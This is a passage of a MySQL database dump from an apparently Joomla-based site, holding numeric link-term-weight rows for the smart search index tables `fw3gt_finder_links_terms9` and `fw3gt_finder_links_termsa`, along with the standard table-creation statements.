9669),(4777,1629618,0.86331),(4927,1629618,0.86331),(4777,1629619,1.07331),(4777,1629620,0.28),(4777,1629621,1.00331),(4777,1629622,1.28331),(4777,1629623,0.42),(4777,1629624,1.14331),(4777,1629625,1.30669),(4777,1629626,0.28),(4777,1629627,1.12),(4777,1629628,1.23669),(4777,1629629,0.37331),(4777,1629630,0.98),(4777,1629631,1.14331),(4777,1629671,0.37331),(4777,1629672,1.05),(4777,1629673,1.21331),(4777,1629674,0.28),(4777,1629675,1.05),(4777,1629676,1.16669),(4777,1629677,1.13339),(4777,1629678,2.05338),(4777,1629679,1.21331),(4777,1629680,1.14331),(4777,1629681,1.00331),(4777,1629682,1.12),(4777,1629683,1.19),(4777,1629684,1.33),(4777,1629685,1.02669),(4777,1629686,1.16669),(4777,1629687,0.37331),(4777,1629688,1.02669),(4777,1629689,1.19),(4777,1629690,1.86676),(4777,1629691,1.12),(4777,1629692,1.16669),(4777,1629693,1.14331),(4777,1629694,1.26),(4777,1629695,1.19),(4777,1629696,1.33),(4777,1629697,1.09669),(4777,1629698,1.14331),(4777,1629699,0.46669),(4777,1629700,1.14331),(4777,1629701,1.19),(4777,1629702,0.14),(4777,1629703,0.91),(4777,1629704,1.12),(4777,1629705,0.37331),(4777,1629706,1.02669),(4777,1629707,1.12),(4777,1629708,0.69993),(4777,1629709,0.93331),(4777,1629710,1.12),(4777,1629711,1.00331),(4777,1629712,1.16669),(4777,1629713,0.93331),(4777,1629714,1.21331),(4777,1629715,0.28),(4777,1629716,0.88669),(4777,1629717,1.16669),(4777,1629718,0.42),(4777,1629719,1.07331),(4777,1629720,1.21331),(4777,1629721,0.42),(4777,1629722,1.00331),(4777,1629723,1.14331),(4777,1629724,0.46669),(4777,1629725,1.02669),(4777,1629726,1.14331),(4777,1629727,0.79992),(4777,1629728,0.86331),(4777,1629729,0.95669),(4777,1629730,2.15339),(4777,1629731,2.77661),(4777,1629732,0.46662),(4777,1629733,0.86331),(4777,1629734,1.00331),(4777,1629735,0.91),(4777,1629736,1.02669),(4777,1629737,0.23331),(4777,1629738,0.88669),(4777,1629739,1.02669),(4777,1629740,0.28),(4777,1629741,0.91),(4777,1629742,1.05),(4780,1629954,2.5334),(4780,1629955,2.8666),(4780,1629958,0.34),(4849,1629958,0.62),(4780,1629959,1.98339),(4780,1629960,2.32339),(4780,1629969,0.56661),(4780,1629970,2.26661),(4780,1629971,2.55),(4798,1643263,0.32669),(4798,1643264,1.09669),(4798,1643265,1.19),(4798,1643266,0.32669),(4798,1643267,0.98),(4798,1643268,1.23669),(4798,1643269,0.7),(4798,1643270,1.35331),(4798,1643271,1.4),(4798,1643272,0.7),(4798,1643273,1.14331),(4798,1643274,1.4),(4798,1643275,0.56),(4798,1643276,1.23669),(4798,1643277,1.4),(4798,1643518,0.37331),(4798,1643519,1.37669),(4798,1643520,1.4),(4798,1643521,0.42),(4798,1643522,1.14331),(4798,1643523,1.19),(4798,1643524,0.23331),(4798,1643525,1.00331),(4798,1643526,1.12),(4798,1643527,0.42),(4798,1643528,1.30669),(4798,1643529,1.37669),(4798,1643530,0.42),(4798,1643531,1.09669),(4798,1643532,1.37669),(4798,1643533,0.37331),(4798,1643534,0.93331),(4798,1643535,1.09669),(4798,1643536,0.84),(4798,1643537,1.12),(4798,1643538,1.16669),(4798,1643539,0.95669),(4798,1643540,1.16669),(4798,1643541,0.51331),(4798,1643542,1.16669),(4798,1643543,1.37669),(4798,1643544,0.23331),(4798,1643545,1.02669),(4798,1643546,1.23669),(4798,1643547,0.42),(4798,1643548,0.95669),(4798,1643549,1.37669),(4798,1643713,0.98),(4798,1643714,0.95669),(4798,1643715,1.21331),(4798,1643716,1.02669),(4798,1643717,1.19),(4798,1643718,1.00331),(4798,1643719,1.07331),(4798,1643720,1.26),(4798,1643721,1.4),(4798,1643722,0.46669),(4798,1643723,1.00331),(4798,1643724,1.23669),(4798,1643725,0.32669),(4798,1643726,1.19),(4798,1643727,1.23669),(4798,1643728,0.51331),(4798,1643729,1.05),(4798,1643730,1.16669),(4798,1643731,0.84),(4798,1643732,1.00331),(4798,1643733,1.12),(4798,1643734,1.00331),(4798,1643735,1.26),(4798,1643736,0.23331),(4798,1643737,1.09669),(4798,1643738,1.23669),(4798,1643739,1.02669),(4798,1643740,1.12),(4798,1643741,0.28),(4798,1643742,0.93331),(4798,1643743,1.19),(4798,1643744,0.7),(4798,1643745,1.23669),(4798,1643746,1.4),(4798,1643747,0.60669),(4798,1643748,1.28331),(4798,1643749,1.37669),(4798,1643750,0.65331),(4798,1643751,1.28331),(4798,1643752,1.33),(4798,1643753,0.60669),(4798,1643754,1.33),(4798,1643755,1.4),(4798,1643756,0.46662),(4798,1643757,1.02669),(4798,1643758,1.07331),(4798,1643759,1.02669),(4798,1643760,1.23669),(4798,1643761,0.37338),(4798,1643762,1.12),(4798,1643763,1.4),(4798,1643764,1.14331),(4798,1643765,1.4),(4927,1644972,0.84),(4803,1644972,2.04),(4803,1644973,2.49339),(4803,1644974,0.84),(4803,1644975,0.95669),(4803,1644976,0.93331),(4803,1644977,0.98),(4803,1644978,0.91),(4803,1644979,1.09669),(4803,1644980,1.00331),(4803,1644981,1.21331),(4803,1644982,0.90661),(4803,1644983,2.32339),(4803,1644984,2.77661),(4803,1645053,0.28),(4849,1645053,0.28),(4927,1645053,0.28),(4803,1645054,0.95669),(4803,1645055,1.16669),(4803,1645056,0.28),(4909,1645056,0.56),(4803,1645057,1.07331),(4803,1645058,1.19),(4803,1645059,0.7),(4803,1645060,1.35331),(4803,1645061,1.4),(4803,1645062,0.37331),(4917,1645062,0.37331),(4803,1645063,1.14331),(4803,1645064,1.33),(4803,1645101,0.79339),(4803,1645102,2.38),(4803,1645103,2.55),(4803,1645104,0.37331),(4803,1645105,1.00331),(4803,1645106,1.19),(4804,1645170,2.4666),(4804,1645171,2.8),(4804,1645172,0.9334),(4804,1645173,2.8666),(4804,1645174,3),(4804,1645180,2.26661),(4806,1645260,1.0666),(4814,1645260,1.0666),(4806,1645261,2.8666),(4814,1645261,2.8666),(4806,1645262,3.2),(4814,1645262,3.2),(4806,1645272,0.9334),(4806,1645273,2.8),(4806,1645274,2.9334),(4806,1645275,2.4),(4806,1645276,3),(4806,1645285,0.56661),(4806,1645286,2.38),(4806,1645287,2.60661),(4808,1645350,1.6),(4808,1645351,3.2),(4808,1645361,0.56661),(4809,1645391,0.6666),(4809,1645392,2.7334),(4809,1645393,2.9334),(4809,1645402,0.68),(4809,1645403,2.38),(4809,1645404,2.72),(4813,1645524,2.49339),(4813,1645525,2.66339),(4814,1645596,0.9334),(4814,1645597,2.6666),(4814,1645598,3.2666),(4814,1645616,1.24661),(4814,1645617,2.83339),(4837,1646503,5.8668),(4850,1646503,5.8668),(4928,1646503,5.8668),(4951,1646503,5.8668),(4837,1646504,7.7332),(4850,1646504,7.7332),(4928,1646504,7.7332),(4951,1646504,7.7332),(4839,1646585,2.26661),(4839,1646602,0.88669),(4839,1646603,1.02669),(4839,1646604,1.02669),(4847,1646604,1.02669),(4857,1646604,1.02669),(4839,1646605,1.28331),(4847,1646605,1.28331),(4839,1646614,0.23331),(4839,1646615,0.86331),(4839,1646616,1.12),(4839,1646617,0.23331),(4839,1646618,0.93331),(4839,1646619,1.05),(4847,1646867,0.88669),(4847,1646868,1.14331),(4847,1646869,0.68),(4852,1646872,0.32669),(4847,1646872,0.79339),(4847,1646873,2.49339),(4847,1646874,0.32669),(4847,1646875,1.00331),(4847,1646876,1.16669),(4849,1646957,6.3),(4849,1646958,2.9332),(4849,1646959,6.1332),(4849,1647042,1.63338),(4849,1647043,1.96),(4849,1647044,2.09661),(4849,1647045,2.77661),(4849,1647046,0.42),(4940,1647046,0.84),(4849,1647047,1.00331),(4849,1647048,1.14331),(4849,1647049,0.42),(4940,1647049,0.42),(4849,1647050,1.05),(4849,1647051,1.28331),(4849,1647052,0.32669),(4849,1647053,0.98),(4849,1647054,1.14331),(4849,1647055,1.00331),(4849,1647056,0.86331),(4849,1647057,1.19),(4849,1647058,0.7),(4849,1647059,0.84),(4849,1647060,0.98),(4849,1647061,3.36),(4849,1647062,4.2),(4849,1647204,0.37331),(4849,1647205,1.19),(4849,1647206,1.30669),(4849,1647207,0.42),(4849,1647208,1.07331),(4849,1647209,1.33),(4849,1647210,0.93331),(4849,1647211,1.05),(4849,1647212,0.28),(4849,1647213,1.09669),(4849,1647214,1.14331),(4849,1647215,0.23331),(4849,1647216,1.02669),(4849,1647217,1.12),(4849,1647218,0.28),(4849,1647219,1.07331),(4849,1647220,1.21331),(4849,1647221,0.60669),(4849,1647222,1.16669),(4849,1647223,1.26),(4849,1647308,0.98),(4849,1647309,1.05),(4849,1647310,1.02669),(4849,1647311,1.21331),(4849,1647312,0.32669),(4849,1647313,0.93331),(4849,1647314,1.26),(4849,1647315,0.74662),(4849,1647316,1.09669),(4849,1647317,1.37669),(4849,1647318,0.98),(4849,1647319,1.07331),(4849,1647320,0.93331),(4849,1647321,0.98),(4849,1647322,0.46669),(4927,1647322,0.46669),(4849,1647323,1.05),(4849,1647324,1.12),(4849,1647325,0.32669),(4849,1647326,0.98),(4849,1647327,1.07331),(4849,1647328,0.51331),(4849,1647329,1.09669),(4849,1647330,1.30669),(4940,1647331,0.42),(4849,1647331,0.84),(4849,1647332,1.05),(4849,1647333,1.21331),(4849,1647334,0.98),(4849,1647335,1.26),(4849,1647336,0.46669),(4938,1647336,0.46669),(4940,1647336,0.93338),(4849,1647337,1.12),(4849,1647338,1.30669),(4849,1647339,0.32669),(4849,1647340,1.05),(4849,1647341,1.30669),(4849,1647342,0.32669),(4849,1647343,1.05),(4849,1647344,1.16669),(4849,1647345,0.37331),(4849,1647346,0.93331),(4849,1647347,1.07331),(4849,1647348,0.23331),(4849,1647349,0.95669),(4849,1647350,1.02669),(4849,1647351,0.28),(4849,1647352,0.95669),(4849,1647353,1.07331),(4850,1647957,2.26661),(4928,1647957,2.26661),(4951,1647957,2.26661),(4850,1647958,2.38),(4850,1647959,2.60661),(4928,1647959,2.60661),(4951,1647959,2.60661),(4850,1647960,3.06),(4928,1647960,3.06),(4951,1647960,3.06),(4851,1647986,0.68),(4851,1647987,2.55),(4851,1647988,3.06),(4851,1647998,0.91),(4852,1647998,0.91),(4851,1647999,1.16669),(4852,1647999,1.16669),(4851,1648000,1.02669),(4852,1648000,1.02669),(4851,1648001,1.14331),(4852,1648001,1.14331),(4852,1648048,0.88669),(4852,1648049,1.00331),(4852,1648052,0.28),(4938,1648052,0.28),(4852,1648053,1.12),(4852,1648054,1.37669),(4852,1648064,0.93331),(4852,1648065,1.05),(4852,1648066,0.42),(4852,1648067,1.09669),(4852,1648068,1.14331),(4857,1648303,1.02669),(4857,1648304,1.19),(4857,1648324,0.98),(4857,1648325,1.23669),(4857,1648326,1.28331),(4909,1672250,0.14),(4909,1672251,0.91),(4909,1672252,1.19),(4909,1672344,0.79331),(4909,1672345,0.86331),(4909,1672346,0.79331),(4909,1672347,0.86331),(4909,1672348,0.37331),(4909,1672349,0.93331),(4909,1672350,1.07331),(4909,1672351,0.98),(4909,1672352,1.05),(4909,1672353,0.91),(4909,1672354,1.07331),(4909,1672355,0.42),(4909,1672356,1.12),(4909,1672357,1.21331),(4909,1672415,1.07331),(4909,1672416,0.56),(4909,1672417,1.02669),(4909,1672418,1.07331),(4909,1672419,0.28),(4909,1672420,1.05),(4909,1672421,1.09669),(4917,1678868,1.6),(4917,1678869,6.4),(4917,1678870,8),(4917,1678978,1.12),(4917,1678979,2.42662),(4917,1678980,2.8),(4917,1678981,1.00331),(4917,1678982,1.09669),(4917,1678983,0.98007),(4917,1678984,1.02669),(4917,1678985,1.16669),(4917,1678986,1.05),(4917,1678987,1.19),(4917,1678988,0.88669),(4917,1678989,0.98),(4917,1678990,0.88669),(4917,1678991,0.98),(4917,1678992,0.86331),(4917,1678993,0.95669),(4917,1679182,1.07331),(4917,1679183,1.23669),(4917,1679184,0.56),(4917,1679185,1.02669),(4917,1679186,1.21331),(4917,1679187,0.37331),(4917,1679188,1.05),(4917,1679189,1.28331),(4917,1679190,0.32669),(4917,1679191,0.91),(4917,1679192,1.21331),(4917,1679193,0.93331),(4917,1679194,1.19),(4917,1679281,0.28),(4917,1679282,0.91),(4917,1679283,1.07331),(4938,1679284,0.23331),(4940,1679284,0.23331),(4917,1679284,0.46662),(4917,1679285,0.93331),(4938,1679285,0.93331),(4940,1679285,0.93331),(4917,1679286,1.05),(4938,1679286,1.05),(4940,1679286,1.05),(4917,1679287,1.12),(4917,1679288,1.23669),(4917,1679289,0.37331),(4917,1679290,1.05),(4917,1679291,1.19),(4917,1679292,0.23331),(4917,1679293,1.00331),(4917,1679294,1.05),(4924,1680558,1.3332),(4924,1680567,0.79339),(4924,1680568,2.26661),(4924,1680569,2.66339),(4924,1680579,1.02),(4924,1680580,2.55),(4924,1680581,2.77661),(4927,1682840,0.7),(4927,1682841,1.28331),(4927,1682842,1.4),(4927,1682843,0.65331),(4927,1682844,1.12),(4927,1682845,1.19),(4927,1682846,1.09669),(4927,1682847,0.86331),(4927,1682848,1.09669),(4927,1682849,2.26661),(4927,1682850,2.60661),(4927,1682851,0.37324),(4927,1682852,3.92),(4927,1682853,4.76),(4927,1682854,0.14),(4927,1682855,0.84),(4927,1682856,1.00331),(4927,1683050,0.98007),(4927,1683051,1.05),(4927,1683052,1.21331),(4927,1683053,0.95669),(4927,1683054,1.14331),(4927,1683055,0.98),(4927,1683056,1.07331),(4927,1683057,1.12),(4927,1683058,1.35331),(4927,1683059,0.95669),(4927,1683060,1.02669),(4927,1683061,0.32669),(4927,1683062,1.02669),(4927,1683063,1.16669),(4927,1683064,0.98),(4927,1683065,0.42),(4938,1683065,0.42),(4927,1683066,1.00331),(4927,1683067,1.07331),(4927,1683068,0.56),(4927,1683069,1.21331),(4927,1683070,1.37669),(4927,1683071,0.18669),(4938,1683071,0.18669),(4927,1683072,0.95669),(4927,1683073,1.12),(4927,1683074,0.42),(4927,1683075,1.02669),(4927,1683076,1.09669),(4927,1683077,0.46669),(4927,1683078,1.09669),(4927,1683079,1.16669),(4927,1683152,0.18669),(4927,1683153,0.86331),(4927,1683154,1.09669),(4927,1683155,0.23331),(4940,1683155,0.23331),(4927,1683156,1.02669),(4927,1683157,1.12),(4927,1683158,0.98),(4927,1683159,1.21331),(4927,1683160,0.88669),(4927,1683161,1.09669),(4927,1683162,1.16669),(4927,1683163,1.37669),(4927,1683164,1.02669),(4927,1683165,1.12),(4927,1683166,0.32669),(4927,1683167,1.12),(4927,1683168,1.21331),(4927,1683169,0.42),(4927,1683170,1.12),(4927,1683171,1.4),(4927,1683172,0.37331),(4927,1683173,1.14331),(4927,1683174,1.30669),(4927,1683175,1.16669),(4927,1683176,1.37669),(4927,1683177,1.02669),(4927,1683178,1.4),(4928,1683734,2.60661),(4929,1683762,7.0668),(4929,1683763,7.3332),(4930,1683795,1.02),(4931,1683821,2.66339),(4931,1683822,3.11661),(4938,1686135,2.1332),(4938,1686136,5.7332),(4938,1686137,6.4),(4938,1686206,0.65338),(4938,1686207,1.91338),(4938,1686208,1.02669),(4938,1686209,1.07331),(4938,1686210,0.90661),(4938,1686211,2.43661),(4938,1686212,1.09669),(4938,1686213,1.16669),(4938,1686214,0.86331),(4940,1686214,0.86331),(4938,1686215,1.02669),(4940,1686215,1.02669),(4938,1686216,1.09669),(4938,1686217,1.30669),(4938,1686218,0.98),(4940,1686218,0.98),(4938,1686219,1.37669),(4940,1686219,1.37669),(4938,1686220,0.88669),(4938,1686221,1.09669),(4938,1686222,0.86331),(4938,1686223,1.09669),(4938,1686224,0.28),(4938,1686225,0.56),(4938,1686226,0.81669),(4938,1686227,1.07331),(4938,1686228,0.84),(4938,1686229,1.09669),(4938,1686230,0.98),(4938,1686231,1.02669),(4938,1686232,0.84),(4938,1686233,1.07331),(4938,1686365,1.11993),(4938,1686366,3.36),(4938,1686367,2.38),(4938,1686368,1.19),(4938,1686369,0.98007),(4938,1686370,3.21993),(4938,1686371,3.92007),(4938,1686372,0.37331),(4938,1686373,0.95669),(4938,1686374,1.14331),(4938,1686375,0.28),(4940,1686375,0.96),(4938,1686376,0.95669),(4938,1686377,1.02669),(4938,1686378,0.65338),(4940,1686378,0.65338),(4938,1686379,0.98),(4938,1686380,1.16669),(4938,1686381,1.07331),(4938,1686382,1.23669),(4938,1686383,0.51331),(4938,1686384,1.19),(4938,1686385,1.4),(4938,1686386,0.28),(4938,1686387,1.09669),(4938,1686388,1.35331),(4938,1686389,1.07331),(4938,1686390,1.21331),(4938,1686391,1.00331),(4938,1686392,1.07331),(4938,1686393,0.93338),(4938,1686394,2.05338),(4938,1686395,1.23669),(4938,1686396,1.09669),(4938,1686397,0.51331),(4938,1686398,1.21331),(4938,1686399,1.4),(4938,1686400,0.90661),(4938,1686401,2.43661),(4938,1686402,3.00339),(4938,1686403,0.86331),(4938,1686404,0.91),(4938,1686405,0.32669),(4938,1686406,0.93331),(4938,1686407,1.19),(4938,1686521,1.07331),(4940,1686521,1.07331),(4938,1686522,0.28),(4938,1686523,1.02669),(4938,1686524,1.23669),(4938,1686525,0.98),(4938,1686526,1.05),(4938,1686527,0.42),(4938,1686528,0.95669),(4938,1686529,1.14331),(4938,1686530,1.19),(4938,1686531,1.30669),(4938,1686532,1.68),(4938,1686533,0.98),(4938,1686534,1.16669),(4938,1686535,1.96),(4938,1686536,1.30669),(4938,1686537,1.12),(4938,1686538,0.98),(4938,1686539,1.26),(4938,1686540,1.21331),(4938,1686541,1.4),(4938,1686542,0.46669),(4938,1686543,1.23669),(4938,1686544,1.4),(4938,1686545,0.42),(4940,1686545,0.42),(4938,1686546,1.02669),(4940,1686546,1.02669),(4938,1686547,1.09669),(4940,1686547,1.09669),(4938,1686548,0.28),(4938,1686549,0.91),(4938,1686550,1.07331),(4938,1686551,1.19),(4938,1686552,1.37669),(4940,1688210,1.8668),(4940,1688211,6.4),(4940,1688212,6.6668),(4940,1688213,1.8668),(4940,1688214,6.1332),(4940,1688215,6.5332),(4940,1688216,2.4),(4940,1688217,6.5332),(4940,1688218,7.6),(4940,1688292,0.32669),(4940,1688293,1.14331),(4940,1688294,1.21331),(4940,1688295,0.37331),(4940,1688296,1.00331),(4940,1688297,1.05),(4940,1688298,0.7),(4940,1688299,1.26),(4940,1688300,1.4),(4940,1688301,1.09669),(4940,1688302,1.33),(4940,1688303,1.19),(4940,1688304,1.35331),(4940,1688305,1.07331),(4940,1688306,1.28331),(4940,1688307,1.23669),(4940,1688308,1.28331),(4940,1688484,0.95669),(4940,1688485,1.23669),(4940,1688486,2.21),(4940,1688487,2.72),(4940,1688488,0.37331),(4940,1688489,0.95669),(4940,1688490,1.12),(4940,1688491,0.65338),(4940,1688492,1.09669),(4940,1688493,1.26),(4940,1688494,1.19),(4940,1688495,1.4),(4940,1688496,0.91),(4940,1688497,1.05),(4940,1688498,0.98),(4940,1688499,1.23669),(4940,1688500,0.37331),(4940,1688501,1.14331),(4940,1688502,1.33),(4940,1688503,0.18669),(4940,1688504,0.84),(4940,1688505,1.07331),(4940,1688506,0.28),(4940,1688507,1.00331),(4940,1688508,1.07331),(4940,1688509,1.07331),(4940,1688510,1.33),(4940,1688511,0.42),(4940,1688512,1.14331),(4940,1688513,1.4),(4940,1688514,0.42),(4940,1688515,1.21331),(4940,1688516,1.30669),(4940,1688611,0.86331),(4940,1688612,1.05),(4940,1688613,0.93331),(4940,1688614,1.00331),(4940,1688615,0.23331),(4940,1688616,1.05),(4940,1688617,1.28331),(4940,1688618,0.28),(4940,1688619,0.91),(4940,1688620,1.16669),(4940,1688621,0.28),(4940,1688622,0.91),(4940,1688623,1.07331),(4940,1688624,0.46669),(4940,1688625,1.00331),(4940,1688626,1.28331),(4940,1688627,0.32669),(4940,1688628,0.95669),(4940,1688629,1.09669),(4940,1688630,0.90661),(4940,1688631,2.32339),(4940,1688632,2.77661),(4940,1688633,1.05),(4940,1688634,1.4),(4940,1688635,1.12),(4940,1688636,1.16669),(4940,1688637,0.46669),(4940,1688638,1.12),(4940,1688639,1.4),(4940,1688640,1.26),(4940,1688641,1.37669),(4940,1688642,1.05),(4940,1688643,1.28331),(4945,1689255,0.56661),(4948,1689328,0.8),(4948,1689329,5.3332),(4951,1689388,2.55),(4953,1689415,2.1332),(4953,1689416,5.7332),(4953,1689417,6.2668),(4955,1689486,0.32669),(4955,1689487,0.91),(4955,1689488,1.05),(4956,1689502,2.4),(4956,1689503,6),(4956,1689504,6.8),(4957,1689519,2.6666),(4957,1689520,2.8),(4957,1689525,1.13339),(4957,1689526,2.72);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms9` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_termsa`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_termsa`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_termsa` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_termsa`
--

LOCK TABLES `fw3gt_finder_links_termsa` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_termsa` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_termsa` VALUES (4723,1523640,0.45339),(4764,1523640,0.45339),(4723,1523641,2.38),(4764,1523641,2.38),(4723,1523642,2.55),(4764,1523642,2.55),(4608,1523643,0.32669),(4614,1523643,0.32669),(4917,1523643,0.65338),(4723,1523643,0.79339),(4764,1523643,0.79339),(4850,1523643,0.79339),(4723,1523644,2.38),(4764,1523644,2.38),(4723,1523645,2.66339),(4764,1523645,2.66339),(4798,1523795,0.14),(4538,1523795,0.4),(4552,1523950,0.28),(4552,1523951,1.05),(4552,1523952,1.19),(4569,1524756,0.51331),(4569,1524814,0.51331),(4571,1524814,0.51331),(4572,1524814,0.51331),(4661,1524814,0.51331),(4669,1524814,0.51331),(4741,1524814,0.51331),(4749,1524814,0.51331),(4753,1524814,0.51331),(4839,1524814,0.51331),(4847,1524814,0.51331),(4851,1524814,0.51331),(4852,1524814,0.51331),(4569,1524815,1.00331),(4571,1524815,1.00331),(4572,1524815,1.00331),(4661,1524815,1.00331),(4669,1524815,1.00331),(4741,1524815,1.00331),(4749,1524815,1.00331),(4753,1524815,1.00331),(4839,1524815,1.00331),(4847,1524815,1.00331),(4851,1524815,1.00331),(4852,1524815,1.00331),(4569,1524816,1.12),(4571,1524816,1.12),(4572,1524816,1.12),(4661,1524816,1.12),(4669,1524816,1.12),(4741,1524816,1.12),(4749,1524816,1.12),(4753,1524816,1.12),(4839,1524816,1.12),(4847,1524816,1.12),(4851,1524816,1.12),(4852,1524816,1.12),(4569,1524817,0.46669),(4571,1524817,0.46669),(4572,1524817,0.46669),(4661,1524817,0.46669),(4669,1524817,0.46669),(4741,1524817,0.46669),(4749,1524817,0.46669),(4753,1524817,0.46669),(4803,1524817,0.46669),(4839,1524817,0.46669),(4847,1524817,0.46669),(4851,1524817,0.46669),(4852,1524817,0.46669),(4569,1524818,1.14331),(4571,1524818,1.14331),(4572,1524818,1.14331),(4661,1524818,1.14331),(4669,1524818,1.14331),(4741,1524818,1.14331),(4749,1524818,1.14331),(4753,1524818,1.14331),(4839,1524818,1.14331),(4847,1524818,1.14331),(4851,1524818,1.14331),(4852,1524818,1.14331),(4569,1524819,1.4),(4571,1524819,1.4),(4572,1524819,1.4),(4661,1524819,1.4),(4669,1524819,1.4),(4741,1524819,1.4),(4749,1524819,1.4),(4753,1524819,1.4),(4839,1524819,1.4),(4847,1524819,1.4),(4851,1524819,1.4),(4852,1524819,1.4),(4669,1524820,0.32669),(4741,1524820,0.32669),(4753,1524820,0.32669),(4569,1524820,0.79339),(4569,1524821,2.49339),(4569,1524822,3.00339),(4672,1525175,1.02),(4593,1527397,0.34),(4593,1527398,2.26661),(4593,1527399,2.55),(4594,1527576,0.18669),(4909,1527576,1.01346),(4594,1527577,0.88669),(4594,1527578,0.95669),(4594,1527579,0.28),(4594,1527580,0.98),(4594,1527581,1.19),(4625,1527582,0.09331),(4594,1527582,0.18662),(4798,1527582,0.55986),(4594,1527583,0.79331),(4594,1527584,0.86331),(4594,1527585,0.79331),(4594,1527586,0.86331),(4608,1529132,0.04669),(4614,1529132,0.04669),(4616,1529132,0.04669),(4617,1529132,0.04669),(4625,1529132,0.04669),(4851,1529132,0.04669),(4852,1529132,0.04669),(4857,1529132,0.04669),(4955,1529132,0.04669),(4604,1529132,0.09338),(4762,1529132,0.14007),(4761,1529132,1.26063),(4604,1529133,0.86331),(4608,1529133,0.86331),(4614,1529133,0.86331),(4616,1529133,0.86331),(4617,1529133,0.86331),(4625,1529133,0.86331),(4604,1529134,0.95669),(4608,1529134,0.95669),(4614,1529134,0.95669),(4617,1529134,0.95669),(4625,1529134,0.95669),(4604,1529141,0.32669),(4608,1529141,0.32669),(4614,1529141,0.32669),(4616,1529141,0.32669),(4617,1529141,0.32669),(4625,1529141,0.32669),(4626,1529141,0.32669),(4693,1529141,0.32669),(4624,1529158,0.09331),(4617,1529158,0.18662),(4604,1529158,0.27993),(4614,1529158,1.30634),(4626,1529158,1.39965),(4608,1529158,1.77289),(4604,1529192,0.37331),(4608,1529192,0.37331),(4617,1529192,0.37331),(4626,1529192,0.37331),(4604,1529193,1.09669),(4608,1529193,1.09669),(4617,1529193,1.09669),(4604,1536232,0.81669),(4604,1536233,0.88669),(4604,1536234,0.84),(4604,1536235,2.33338),(4604,1536236,2.52),(4604,1536237,0.7),(4604,1536238,1.30669),(4604,1536239,1.37669),(4604,1536240,1.00331),(4604,1536241,1.21331),(4604,1536242,0.23331),(4616,1536242,0.23331),(4617,1536242,0.23331),(4625,1536242,0.23331),(4626,1536242,0.23331),(4734,1536242,0.23331),(4762,1536242,5.13282),(4761,1536242,7.93254),(4604,1536243,0.88669),(4616,1536243,0.88669),(4617,1536243,0.88669),(4625,1536243,0.88669),(4604,1536244,1.16669),(4617,1536244,1.16669),(4625,1536244,1.16669),(4604,1536245,0.98),(4604,1536246,1.19),(4604,1536247,1.12),(4604,1536248,1.4),(4604,1536249,0.95669),(4604,1536250,1.16669),(4604,1536251,1.30669),(4616,1536252,0.56),(4604,1536252,1.12),(4624,1536252,1.36),(4604,1536253,1.05),(4624,1536253,2.55),(4604,1536254,1.12),(4604,1536255,1.23669),(4604,1536256,1.37669),(4604,1536257,1.21338),(4604,1536258,1.4),(4604,1536259,1.4),(4604,1536260,1.07331),(4604,1536261,1.30669),(4604,1536462,0.14),(4604,1536463,0.84),(4604,1536464,1.07331),(4608,1540066,0.07),(4617,1540066,0.07),(4658,1540066,0.07),(4669,1540066,0.07),(4927,1540066,0.07),(4762,1540066,0.14),(4909,1540066,0.14),(4732,1540066,0.35),(4761,1540066,0.7),(4608,1540067,0.79331),(4608,1540068,0.93331),(4616,1540069,0.14),(4608,1540069,0.28),(4608,1540070,1.63338),(4608,1540071,0.98),(4608,1540072,1.00331),(4608,1540073,0.28),(4614,1540073,0.56),(4608,1540074,0.86331),(4614,1540074,1.72662),(4608,1540075,0.95669),(4608,1540349,0.18669),(4608,1540350,0.88669),(4608,1540351,0.95669),(4608,1540352,0.46662),(4608,1540353,1.77338),(4608,1540354,2.47338),(4608,1540355,0.23331),(4614,1540355,0.23331),(4626,1540355,0.23331),(4734,1540355,0.23331),(4608,1540356,0.91),(4614,1540356,0.91),(4626,1540356,0.91),(4608,1540357,1.19),(4614,1540357,1.19),(4626,1540357,1.19),(4608,1540358,0.91),(4614,1540358,0.91),(4608,1540359,1.00331),(4614,1540359,1.00331),(4608,1540360,0.14),(4625,1540360,0.14),(4710,1540360,0.14),(4608,1540361,1.02669),(4608,1540362,1.07331),(4608,1540363,1.30662),(4608,1540364,2.14662),(4608,1540365,2.75338),(4608,1540366,0.42),(4608,1540367,1.02669),(4608,1540368,1.09669),(4608,1540369,0.91),(4608,1540370,0.95669),(4608,1540371,0.93331),(4608,1540372,1.05),(4608,1540373,5.59986),(4614,1540373,8.39979),(4608,1540374,1.00331),(4614,1540374,1.00331),(4608,1540375,1.02669),(4614,1540375,1.02669),(4608,1540376,1.00331),(4614,1540376,1.00331),(4608,1540377,1.00331),(4614,1540377,1.00331),(4608,1540378,1.00331),(4614,1540378,1.00331),(4608,1540379,0.98),(4614,1540379,0.98),(4608,1540380,0.91),(4608,1540381,1.02669),(4608,1540382,0.84),(4608,1540383,0.91),(4608,1540384,0.93331),(4608,1540385,1.02669),(4608,1540386,0.93331),(4608,1540387,1.07331),(4608,1540388,0.93331),(4608,1540389,1.00331),(4608,1540390,0.86331),(4608,1540391,0.95669),(4608,1540392,0.98),(4608,1540393,1.09669),(4608,1540394,1.00331),(4608,1540395,1.19),(4608,1540396,0.88669),(4608,1540397,1.00331),(4608,1540398,0.93331),(4608,1540399,1.12),(4608,1540400,0.86331),(4608,1540401,0.95669),(4608,1540402,1.30669),(4614,1540403,0.42),(4608,1540403,0.84),(4608,1540404,2.19338),(4608,1540405,2.70662),(4614,1546202,0.21),(4614,1546203,0.84),(4614,1546204,1.02669),(4614,1546205,1.07331),(4614,1546206,1.09669),(4614,1546662,1.05),(4614,1546663,1.09669),(4614,1546664,0.42),(4614,1546665,1.12),(4614,1546666,1.28331),(4614,1546667,0.51331),(4614,1546668,1.02669),(4614,1546669,1.07331),(4614,1546670,0.28),(461